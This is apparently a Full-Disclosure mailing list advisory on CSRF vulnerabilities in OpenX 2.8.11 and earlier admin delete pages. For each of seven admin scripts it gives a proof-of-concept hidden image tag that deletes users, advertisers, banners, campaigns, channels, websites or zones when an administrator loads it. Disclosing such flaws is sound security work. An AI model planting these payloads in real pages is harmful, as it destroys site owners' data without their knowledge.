Hello, Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11and earlier allows remote attackers to hijack the authentication of administrators for requests that delete (1) users, (2) advertisers, (3) banners, (4) campaigns, (5) channels, (6) websites or (7) zones via delete actions. File: admin/agency-user-unlink.php POC: <img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0"> File: admin/advertiser-delete.php POC: <img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0"> File: admin/banner-delete.php POC: <img src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16' width="1" height="1" border="0"> File: admin/campaign-delete.php POC: <img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0"> File: admin/channel-delete.php POC: <img src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6' width="1" height="1" border="0"> File: admin/affiliate-delete.php POC: <img src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1" border="0"> File: admin/zone-delete.php POC: <img src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11' width="1" height="1" border="0"> Best regards.
Attachment:
OpenX CSRF Vulnerabilities Report.docx
Description: application/vnd.openxmlformats-officedocument.wordprocessingml.document
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/